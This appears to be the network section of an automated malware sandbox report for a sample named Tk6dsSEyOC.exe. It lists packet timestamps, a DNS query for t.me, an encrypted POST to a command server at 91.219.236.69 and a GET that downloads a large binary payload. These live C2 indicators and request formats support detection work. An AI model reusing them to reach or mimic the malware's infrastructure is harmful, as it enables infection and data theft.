                                                                                                                                                  Nov 25, 2021 18:24:15.566824913 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.566840887 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.566868067 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568233013 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568264008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568286896 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568319082 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568324089 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568342924 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568350077 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568368912 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568387032 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568398952 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568412066 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568434000 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568454027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568458080 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568499088 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568501949 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568525076 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568547964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568552017 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568589926 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568592072 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568618059 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568640947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568662882 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568665028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568698883 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568715096 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568722010 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.568773985 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.568996906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.569024086 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.569046021 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.569066048 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.569101095 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.569139957 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619585991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619622946 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619637012 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619654894 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619673967 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619690895 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619705915 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619721889 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619739056 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619757891 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619755030 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619776011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619796991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619816065 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619832993 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619839907 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619857073 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619868994 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619874954 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619894028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619910955 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619929075 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619929075 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619946957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619962931 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619966984 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619980097 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.619987965 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.619997978 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.620014906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.620023012 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.620031118 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.620044947 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.620057106 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.620085955 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662408113 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662441969 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662465096 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662487030 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662508011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662528038 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662549973 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662571907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662592888 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662611008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662621021 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662630081 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662656069 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662674904 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662681103 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662700891 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662723064 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662729025 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662755966 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662765980 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662781954 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662806988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662808895 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662831068 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662857056 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662872076 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662882090 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662905931 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.662906885 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662933111 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662954092 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:15.662955999 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:15.663000107 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:45.701366901 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:45.701497078 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:45.739340067 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:45.739379883 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:45.996284962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:46.038039923 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:46.197452068 CET4977980192.168.2.5188.127.251.217
                                                                                                                                                  Nov 25, 2021 18:24:49.210201979 CET4977980192.168.2.5188.127.251.217
                                                                                                                                                  Nov 25, 2021 18:24:55.210690022 CET4977980192.168.2.5188.127.251.217
                                                                                                                                                  Nov 25, 2021 18:25:12.031976938 CET4976780192.168.2.591.219.236.69

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 25, 2021 18:24:07.833381891 CET5479553192.168.2.58.8.8.8
                                                                                                                                                  Nov 25, 2021 18:24:07.848829031 CET53547958.8.8.8192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Nov 25, 2021 18:24:07.833381891 CET192.168.2.58.8.8.80x9a2fStandard query (0)t.meA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Nov 25, 2021 18:24:07.848829031 CET8.8.8.8192.168.2.50x9a2fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • t.me
                                                                                                                                                  • 91.219.236.69

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.549766149.154.167.99443C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.54976791.219.236.6980C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Nov 25, 2021 18:24:08.364319086 CET1604OUTPOST / HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                  Content-Length: 128
                                                                                                                                                  Host: 91.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:08.364443064 CET1605OUTData Raw: 77 57 70 4e 77 75 64 71 74 53 37 48 51 33 2b 39 4c 37 66 73 48 75 52 35 45 73 6c 67 63 65 33 51 38 76 7a 56 33 54 68 6f 6a 54 46 76 48 67 47 57 48 31 42 6d 43 70 38 37 61 68 5a 6d 5a 62 76 39 32 62 31 75 5a 6b 73 43 4e 4b 35 43 30 6a 55 75 64 62
                                                                                                                                                  Data Ascii: wWpNwudqtS7HQ3+9L7fsHuR5Eslgce3Q8vzV3ThojTFvHgGWH1BmCp87ahZmZbv92b1uZksCNK5C0jUudbyc3RzDeR3yd1ojPbQ8p9hKj7sBGlJNhI18Oi6rOZgrkFM=
                                                                                                                                                  Nov 25, 2021 18:24:08.741292000 CET1606INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 25 Nov 2021 17:24:08 GMT
                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Data Raw: 32 35 36 30 0d 0a 32 48 56 57 6d 37 55 4e 79 7a 71 64 51 44 69 35 51 70 2f 71 63 65 4e 59 65 37 6c 36 47 36 69 66 39 35 2b 59 6c 43 4e 39 36 57 56 63 43 51 7a 32 43 58 30 57 44 64 77 30 4d 78 49 6e 46 72 62 77 71 72 70 6f 42 45 77 41 41 75 6b 4d 38 55 6c 76 4d 4b 54 4f 30 78 71 52 65 55 75 6e 4a 51 67 67 62 65 5a 74 6f 49 6f 62 32 37 77 47 52 51 6f 59 31 49 6f 73 62 7a 6a 38 59 70 41 38 6d 31 6b 31 47 31 76 50 41 67 52 56 73 4c 41 6b 66 34 45 6d 34 58 79 77 35 69 74 66 76 4d 53 69 49 44 44 78 47 53 7a 30 6e 44 79 47 68 6e 6e 65 37 64 69 4b 56 65 7a 42 62 45 53 48 39 56 51 57 34 55 66 6b 74 38 6b 54 43 6d 4a 32 59 6b 4f 75 68 4e 4f 7a 5a 6b 6a 4b 49 55 75 49 6c 6c 37 37 7a 2f 37 2f 49 36 6c 4a 54 33 42 66 31 4a 79 76 56 64 56 70 33 66 50 58 35 2b 76 46 78 54 6f 46 37 50 6e 67 71 30 56 4f 57 49 79 74 7a 4f 34 33 7a 2f 41 6a 75 47 58 47 30 74 68 4c 46 54 36 72 4e 62 30 32 6a 73 48 30 2f 70 4d 2f 6f 61 35 71 73 76 34 2b 71 68 49 4c 39 72 43 7a 5a 54 6c 6e 42 46 41 44 41 39 4a 43 75 31 67 67 48 35 34 72 57 76 46 67 64 66 78 67 67 4e 76 32 38 69 55 34 6d 46 49 37 4a 5a 53 49 5a 6c 6f 52 62 5a 46 77 53 37 52 6f 51 52 4f 44 58 67 59 33 49 69 64 2f 2f 33 73 30 32 46 4d 77 2f 73 64 6d 31 33 32 37 74 71 6d 2f 6a 63 79 74 38 78 32 4a 55 4e 35 76 35 42 6b 52 72 4d 4f 34 5a 33 51 41 76 34 4e 31 30 7a 68 49 62 54 76 77 37 56 45 44 71 48 62 70 51 5a 36 77 36 58 46 53 6c 55 6d 52 37 56 36 73 31 38 72 62 57 65 73 31 46 67 69 59 45 72 61 37 46 51 35 36 49 54 67 69 74 6c 37 4a 53 7a 4a 73 4c 47 74 73 54 53 6a 65 59 59 42 64 6c 79 51 64 55 39 49 4a 37 4d 49 45 69 46 4f 47 49 31 61 48 43 38 67 42 45 38 65 4b 6f 41 70 4e 4a 42 66 39 64 6e 77 61 46 77 62 58 47 70 71 34 49 59 47 51 64 4e 50 44 70 56 68 50 53 58 74 66 53 64 47 6a 69 4e 32 6d 6d 38 45 49 67 50 76 64 4e 78 61 42 39 76 72 30 39 7a 34 61 54 6a 42 68 5a 78 57 66 46 65 77 46 6b 77 79 66 65 53 76 72 57 6c 43 55 53 4c 30 43 62 75 71 56 78 47 37 6f 79 61 52 31 75 4f 37 32 76 4d 2b 39 76 35 6c 62 4b 39 7a 33 32 74 30 41 64 65 65 4e 32 4e 42 45 7a 58 7a 78 62 47 6e 58 6b 69 58 4c 52 6d 6e 58 70 79 54 36 66 6d 46 78 6e 4b 63 55 7a 70 66 54 6a 4f 59 54 61 49 79 38 53 57 71 58 6e 55 65 31 7a 38 54 34 5a 34 4d 70 37 68 31 73 76 31 68 38 4c 63 31 65 4a 33 50 49 72 66 2f 5a 6b 46 78 50 4b 6e 35 46 69 61 73 74 4f 56 69 61 57 56 78 30 65 74 2b 71 78 4d 54 32 34 75 78 73 75 63 62 70 58 38 6f 34 5a 4c 36 63 6a 2b 79 70 56 46 5a 63 56 2f 4f 30 30 44 34 73 75 56 69 78 68 31 32 7a 4b 6b 6c 75 57 33 76 6f 4f 5a 5a 52 58 79 44 75 44 6e 6f 67 38 65 4c 36 36 35 34 64 4f 69 6c 6c 75 30 50 73 48 4a 41 71 77 43 36 39 6f 43 45 74 5a 58 32 77 39 58 4f 5a 6e 50 58 2b 66 45 52 6a 38 74 66 6d 67 50 30 67 74 68 31 78 62 42 63 65 49 75 42 74 46 54 61 76 7a 4b 44 30 45 53 75 71 79 4e 78 2b 4f 47 6d 49 38 67 7a 65 61 72 47 68 63 32 75 6a 35 48 33 46 62 67 67 35 34 39 7a 4c 6f 5a 46 6f 38 7a 51 72 66 6a 6f 66 39 4c 63 65 49 67 73 62 67 38 57 77 48 59 57 6a 44 30 53 72 6c 41 76 48 61 76 74 6b 36 75 42 44 2f 66 35 49 78 64 35 62 39 6a 58 64 56 75 2f 33 73 62 39 37 30 56 67 41 4f 47 49 39 2f 35 4c 45 32 30 66 77 4f 76 6e 51 75 41 56 6e 50 7a 42 7a 65 32 42 4b 6e 38 51 72 44 67 37 4b 32 41 6d 30 34 62 6b 66 6c 34 57 76 32 69 6f 6b 62 42 42 75 4a 2f 59 51 37 61 36 35 38 6b 32 6d 50 45 77 33 64 73 7a 30 75 42 4a 32 44 36 51 7a 35 38 4a 53 47 44 68 78 43 69 56 4b 70 59 34 64 4a 62 63 64 62 56 43 76 38 66
                                                                                                                                                  Data Ascii: 25602HVWm7UNyzqdQDi5Qp/qceNYe7l6G6if95+YlCN96WVcCQz2CX0WDdw0MxInFrbwqrpoBEwAAukM8UlvMKTO0xqReUunJQggbeZtoIob27wGRQoY1Iosbzj8YpA8m1k1G1vPAgRVsLAkf4Em4Xyw5itfvMSiIDDxGSz0nDyGhnne7diKVezBbESH9VQW4Ufkt8kTCmJ2YkOuhNOzZkjKIUuIll77z/7/I6lJT3Bf1JyvVdVp3fPX5+vFxToF7Pngq0VOWIytzO43z/AjuGXG0thLFT6rNb02jsH0/pM/oa5qsv4+qhIL9rCzZTlnBFADA9JCu1ggH54rWvFgdfxggNv28iU4mFI7JZSIZloRbZFwS7RoQRODXgY3Iid//3s02FMw/sdm1327tqm/jcyt8x2JUN5v5BkRrMO4Z3QAv4N10zhIbTvw7VEDqHbpQZ6w6XFSlUmR7V6s18rbWes1FgiYEra7FQ56ITgitl7JSzJsLGtsTSjeYYBdlyQdU9IJ7MIEiFOGI1aHC8gBE8eKoApNJBf9dnwaFwbXGpq4IYGQdNPDpVhPSXtfSdGjiN2mm8EIgPvdNxaB9vr09z4aTjBhZxWfFewFkwyfeSvrWlCUSL0CbuqVxG7oyaR1uO72vM+9v5lbK9z32t0AdeeN2NBEzXzxbGnXkiXLRmnXpyT6fmFxnKcUzpfTjOYTaIy8SWqXnUe1z8T4Z4Mp7h1sv1h8Lc1eJ3PIrf/ZkFxPKn5FiastOViaWVx0et+qxMT24uxsucbpX8o4ZL6cj+ypVFZcV/O00D4suVixh12zKkluW3voOZZRXyDuDnog8eL6654dOillu0PsHJAqwC69oCEtZX2w9XOZnPX+fERj8tfmgP0gth1xbBceIuBtFTavzKD0ESuqyNx+OGmI8gzearGhc2uj5H3Fbgg549zLoZFo8zQrfjof9LceIgsbg8WwHYWjD0SrlAvHavtk6uBD/f5Ixd5b9jXdVu/3sb970VgAOGI9/5LE20fwOvnQuAVnPzBze2BKn8QrDg7K2Am04bkfl4Wv2iokbBBuJ/YQ7a658k2mPEw3dsz0uBJ2D6Qz58JSGDhxCiVKpY4dJbcdbVCv8f
                                                                                                                                                  Nov 25, 2021 18:24:08.741322994 CET1607INData Raw: 76 7a 64 71 34 65 42 63 6d 53 75 41 35 47 4a 74 44 38 61 72 54 35 44 62 4c 46 63 38 69 5a 6a 38 76 67 65 64 48 44 63 6d 43 77 48 45 70 67 77 50 6d 43 4f 39 2f 6a 54 44 47 66 51 43 45 71 57 71 73 75 59 4a 41 54 4e 30 70 50 69 61 59 64 51 34 30 73
                                                                                                                                                  Data Ascii: vzdq4eBcmSuA5GJtD8arT5DbLFc8iZj8vgedHDcmCwHEpgwPmCO9/jTDGfQCEqWqsuYJATN0pPiaYdQ40sIEq6fow2CrPpwm7yYHj4q0fj3Pooa+nZ9c+OhJ+j36+oeoVYLuJ88lArO3Bs9/ILNSNhj7Ewu4poHmWmFjCahjKNBi86ZAjCp8crNiEb5lwNSg5RN942FHo5Z+20reoeem6gJyg0J4jfF3FzEh5vsDukL53jTGqyP
                                                                                                                                                  Nov 25, 2021 18:24:08.741344929 CET1609INData Raw: 2b 4d 38 62 62 2b 47 7a 6e 69 68 71 32 6c 42 42 36 79 34 57 4f 56 49 41 57 72 79 6b 78 35 76 55 35 56 55 54 69 32 46 49 34 73 75 30 36 38 72 30 6a 74 78 41 57 36 43 39 33 4d 65 67 4c 4a 4a 38 52 51 2b 6b 59 6c 37 75 64 34 6f 74 2b 33 53 30 41 41
                                                                                                                                                  Data Ascii: +M8bb+Gznihq2lBB6y4WOVIAWrykx5vU5VUTi2FI4su068r0jtxAW6C93MegLJJ8RQ+kYl7ud4ot+3S0AAhohRczjLWfzYSmWb25G7a8mgDcKpHccladUN80SKcvts0MYQNttNFGghQqVQXqUqcQWsBahudDw9VFlwmyI3I56QnpYfpVbZmSTCzFX4Epi+ps65atUuhDmu6jBfWINvcKMfeVfLQ+2m7XprTowjtGgMJ2MYWn+zg
                                                                                                                                                  Nov 25, 2021 18:24:08.741368055 CET1610INData Raw: 47 58 63 39 71 50 69 42 46 4c 6b 47 62 6b 4d 4f 44 65 66 2b 2f 58 58 30 71 78 61 76 4d 35 48 33 52 44 71 47 76 35 4d 59 37 73 75 51 2b 61 36 43 49 6f 6f 44 44 68 48 37 68 72 4f 55 42 4a 6e 37 6b 34 41 37 4e 7a 55 34 2b 73 46 64 69 44 6d 6f 59 31
                                                                                                                                                  Data Ascii: GXc9qPiBFLkGbkMODef+/XX0qxavM5H3RDqGv5MY7suQ+a6CIooDDhH7hrOUBJn7k4A7NzU4+sFdiDmoY1FWhgd36L0mpcjegz6QncSZompRfHyumCtbEwWiZtMNfklj+fZJBsILOIKRI78F2NsuG/L18sOP8fDkRulnBmcGAG2CM/dmGibOLpQbcjjuOyHTA2KP1hxz+Xbe2+Xp/bTHOEoxARkeVNKkXwNmMxFk4a3q8cGRaKn
                                                                                                                                                  Nov 25, 2021 18:24:08.741391897 CET1611INData Raw: 72 32 59 66 73 76 49 66 33 54 65 43 36 73 36 34 79 58 53 7a 54 76 74 76 68 57 37 2f 58 51 76 4d 63 66 54 5a 57 55 77 6f 35 49 65 61 2b 56 6f 42 75 4b 4e 44 75 52 79 4f 62 4b 34 69 44 4e 34 64 47 78 63 63 2f 64 54 78 44 79 5a 59 34 61 67 46 35 70
                                                                                                                                                  Data Ascii: r2YfsvIf3TeC6s64yXSzTvtvhW7/XQvMcfTZWUwo5Iea+VoBuKNDuRyObK4iDN4dGxcc/dTxDyZY4agF5peYqXgfSak/JKQR3sISjnyT1BFR+ajj1yIfJxMEld75ul64gBBNVDwtQUETZbE6BYthtNt1ySfUwf07JfQa89ctQVJfAXpT/1aY7rw4d/m2ZcST2JJugY4fKCFxAZk41DgRPNkmbWhzeH4/CkVflY1Q+tdaK55tFLf
                                                                                                                                                  Nov 25, 2021 18:24:08.741413116 CET1613INData Raw: 59 6e 6f 50 6b 32 4b 59 47 30 2f 72 4a 4c 7a 33 38 31 2b 42 52 4a 45 4b 64 78 61 68 57 43 47 73 4a 4b 35 4d 6b 4e 65 6c 2f 30 50 31 58 58 4d 38 41 6c 33 31 48 61 31 64 6a 4f 46 78 64 73 54 72 58 75 32 36 33 57 4b 35 6d 75 4a 43 2b 72 5a 53 46 6c
                                                                                                                                                  Data Ascii: YnoPk2KYG0/rJLz381+BRJEKdxahWCGsJK5MkNel/0P1XXM8Al31Ha1djOFxdsTrXu263WK5muJC+rZSFlEAHWqYdOjv5VPrI3p64MOpdaosSa6cCNQzL4cs84QndyXj0pRe7lZRBDk+gHx8DCHlKWnlMnHha1GytOcnLvYebOjWvDT1DwbWZzRFa+/RY3guKIMIk/q/gb7Cs+POSuVbmrrAStfTtHLFvLwMAQsfSg8hyj42i57
                                                                                                                                                  Nov 25, 2021 18:24:08.741436005 CET1614INData Raw: 6a 33 49 31 64 70 6d 58 79 34 6b 71 38 55 44 54 34 37 46 31 6b 4c 33 45 51 4a 69 58 65 6c 4b 73 2b 54 73 49 42 7a 46 68 77 57 75 75 75 79 39 70 79 78 65 33 41 42 49 45 4a 4e 65 6d 65 42 43 59 49 79 52 47 41 6a 55 43 44 70 75 2b 6f 6e 73 61 53 6d
                                                                                                                                                  Data Ascii: j3I1dpmXy4kq8UDT47F1kL3EQJiXelKs+TsIBzFhwWuuuy9pyxe3ABIEJNemeBCYIyRGAjUCDpu+onsaSmD9blU6Olt7MVVtntTpc2KL7Hzi2Q/MyEDXoTBgdSkIfRigsjIttRDFvn0mjc7uiXuxqrFWiM36ooqFVI9E3q8mLahhUacjdxwzkAcYL4ZEmqPcqzNVIdUeztMmPKjfpFovay+6VXMlxDy2KJNLYowWSUcwdaN9fq7
                                                                                                                                                  Nov 25, 2021 18:24:08.741453886 CET1615INData Raw: 55 38 55 6e 66 50 45 65 53 6d 44 47 6b 6e 63 62 61 2f 59 6c 77 5a 4c 31 75 75 61 2f 50 79 36 30 6c 74 67 79 77 4a 4c 31 6b 6c 30 65 77 4f 44 6a 35 38 74 6b 4d 4e 2b 6a 50 2f 6b 68 38 4d 70 41 2f 53 58 63 77 4c 6c 41 43 4a 46 37 36 78 51 71 62 62
                                                                                                                                                  Data Ascii: U8UnfPEeSmDGkncba/YlwZL1uua/Py60ltgywJL1kl0ewODj58tkMN+jP/kh8MpA/SXcwLlACJF76xQqbbp1RKSiBsmsbwbYzvpTccfVUgM8c5CKl2J9aZk4zDntosL/ttzMELUCf8tAS2YYC8FdDM9zPFRNRCAXkz3Zm5hXiXfiSbtkfAF21ZzDLdLvoUMmTKUQUIxCcUxVWHDvXgzyetYiR6TqgRw8VXU1O75NGCH1VogXUld
                                                                                                                                                  Nov 25, 2021 18:24:08.763430119 CET1615OUTGET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: 91.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:09.047899008 CET1616INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 25 Nov 2021 17:24:09 GMT
                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                  Content-Length: 916735
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Sun, 14 Nov 2021 14:06:13 GMT
                                                                                                                                                  ETag: "619117d5-dfcff"
                                                                                                                                                  Accept-Ranges: bytes
